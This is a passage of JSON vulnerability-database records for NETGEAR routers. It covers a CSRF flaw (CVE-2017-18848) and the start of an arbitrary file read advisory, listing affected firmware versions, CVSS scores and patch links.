"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "ac1450",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "ac1450",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r7300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.36"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:ac1450_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
}
]
},
"cve": "CVE-2017-18848",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-18848",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014888",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-39193",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18848",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18848",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014888",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18848",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18848",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014888",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-39193",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94. plural NETGEAR A cross-site request forgery vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR AC1450, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that the WEB application does not fully verify whether the request comes from a trusted user. An attacker can use this vulnerability to send unexpected requests to the server through the affected client",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18848"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "CNVD",
"id": "CNVD-2021-39193"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18848",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-39193",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1625",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1625"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"id": "VAR-202004-1320",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
}
],
"trust": 1.1764285399999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
}
]
},
"last_update_date": "2024-11-23T23:01:24.529000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Cross Site Request Forgery on Some Routers, PSV-2017-0334",
"trust": 0.8,
"url": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334"
},
{
"title": "Patch for Cross-site request forgery vulnerability in multiple NETGEAR products (CNVD-2021-39193)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/269696"
},
{
"title": "Multiple NETGEAR Repair measures for product cross-site request forgery vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116198"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1625"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18848"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000049011/security-advisory-for-cross-site-request-forgery-on-some-routers-psv-2017-0334"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18848"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1625"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1625"
},
{
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"date": "2020-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1625"
},
{
"date": "2020-04-20T16:15:13.930000",
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-39193"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014888"
},
{
"date": "2020-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1625"
},
{
"date": "2024-11-21T03:21:05.050000",
"db": "NVD",
"id": "CVE-2017-18848"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Cross-site request forgery vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014888"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1625"
}
],
"trust": 0.6
}
}
var-202004-1464
Vulnerability from variot
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. NETGEAR R6400, etc. are all products of NETGEAR. NETGEAR R6400 is a wireless router. NETGEAR D6220 is a wireless modem. NETGEAR R6900 is a wireless router. This affects D6220 prior to 1.0.0.32, D6400 prior to 1.0.0.60, D8500 prior to 1.0.3.29, R6250 prior to 1.0.4.16, R6300v2 prior to 1.0.4.18, R6400 prior to 1.01.32, R6400v2 prior to 1.0.2.44, R6700 prior to 1.0.1.36, R6900 prior to 1.0.1.34, R7000 prior to 1.0.9.14, R7000P prior to 1.3.0.8, R6900P prior to 1.3.0.8, R7100LG prior to 1.0.0.34, R7300DST prior to 1.0.0.56, R7900 prior to 1.0.1.26, R8000 prior to 1.0.4.4, R8500 prior to 1.0.2.106, R8300 prior to 1.0.2.106, and WNDR3400v3 prior to 1.0.1.16
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1464",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.01.32"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.4"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.01.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.26"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.28"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6 10.1.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8 10.0.77"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.30"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.46"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.60"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.26"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.01.24"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.2 1.1.93"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.10"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
